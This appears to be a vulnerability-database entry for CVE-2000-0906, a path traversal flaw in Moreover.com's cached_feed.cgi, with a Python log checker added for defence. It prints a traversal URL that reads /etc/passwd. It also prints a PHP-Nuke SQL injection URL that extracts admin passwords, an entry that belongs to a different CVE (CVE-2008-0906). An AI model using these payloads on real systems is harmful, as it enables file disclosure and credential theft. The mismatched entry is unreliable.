CVE-2000-0906
Published 2000-12-19
Priority: P4 · 26 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 8.55% (94.4th percentile)
Directory traversal vulnerability in Moreover.com cached_feed.cgi script version 4.July.00 allows remote attackers to read arbitrary files via a .. (dot dot) attack on the category or format parameters.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moreover.com | cached_feed.cgi_script | — | — |
No detection rules found.
Exploit-DB
PHP-Nuke Module Docum - 'artid' SQL Injection
exploitdb·2008-02-20
CVE-2008-0906 PHP-Nuke Module Docum - 'artid' SQL Injection
---
#########################################################################
php-nuke modules Docum remote sql inj
#########################################################################
Found:DamaR
The hack is over, but the return is near. Since 2000
/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
#########################################################################
Example: http://www.xxx.com.ar/mt/
#########################################################################
# milw0rm.com [2008-02-20]
Exploit-DB
Moreover CGI script - File Disclosure
exploitdb·2000-10-02
CVE-2000-0906 Moreover CGI script - File Disclosure
---
source: https://www.securityfocus.com/bid/1762/info
The 'cached_feed' CGI script supplied by newsfeed vendor Moreover.com contains a file-disclosure vulnerability. The script's 'obtain_file' function, designed to return the contents of a specified file for display in the browser, fails to adequately filter ".." character sequences in user-supplied input. As a result, a carefully formed URL that is submitted to the script can result in the disclosure of files (readable by HTTP user) outside of the CGI script's "allowed" area.
Version 1.0 of the product is affected. The vendor repaired the script and released version 2.0 before this vulnerability was published.
http://www.example.com/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd
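A log check for requests of the kind this advisory describes, as an added example that is not part of the original entry or of any indexed rule: it flags `cached_feed.cgi` requests in which a parameter value (`category` and `format` included) or the key-less query string decodes to a `..` path segment. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

SCRIPT = "/cached_feed.cgi"  # script named in the advisory
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines (Common Log Format); not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Oct/2000:10:00:01 +0000] "GET /cgi-bin/cached_feed.cgi?category=World&format=html HTTP/1.0" 200 5120',
    '192.0.2.77 - - [02/Oct/2000:10:00:09 +0000] "GET /cgi-bin/cached_feed.cgi?../../../.+/etc/passwd HTTP/1.0" 200 1374',
    '192.0.2.77 - - [02/Oct/2000:10:00:12 +0000] "GET /cgi-bin/cached_feed.cgi?category=../../x&format=html HTTP/1.0" 200 88',
    '192.0.2.77 - - [02/Oct/2000:10:00:15 +0000] "GET /cgi-bin/cached_feed.cgi?category=World&format=%252e%252e%252fx HTTP/1.0" 404 0',
    '192.0.2.10 - - [02/Oct/2000:10:00:20 +0000] "GET /cgi-bin/other.cgi?page=v1..2 HTTP/1.0" 200 10',
]


def has_dotdot(value, rounds=3):
    """True if any path segment of the percent-decoded value is exactly '..'."""
    for _ in range(rounds):  # repeat so double-encoded input is also decoded
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return ".." in re.split(r"[/\\]+", value)


def traversal_findings(log_lines):
    """Return (line_number, location) for cached_feed.cgi requests with '..'."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        if not path.lower().endswith(SCRIPT):
            continue
        for part in query.split("&"):
            name, sep, value = part.partition("=")
            if sep and has_dotdot(value):
                findings.append((number, name))  # e.g. 'category' or 'format'
            elif not sep and has_dotdot(part):
                findings.append((number, "raw query"))  # key-less form
    return findings


if __name__ == "__main__":
    for number, location in traversal_findings(SAMPLE_LOG):
        print(f"line {number}: '..' segment in {location}")
```

Matching on whole `..` segments after decoding, rather than on the substring, keeps values such as `World..news` from being flagged.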
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-10/0013.html
http://www.securityfocus.com/bid/1762
https://exchange.xforce.ibmcloud.com/vulnerabilities/5334
Published: 2000-12-19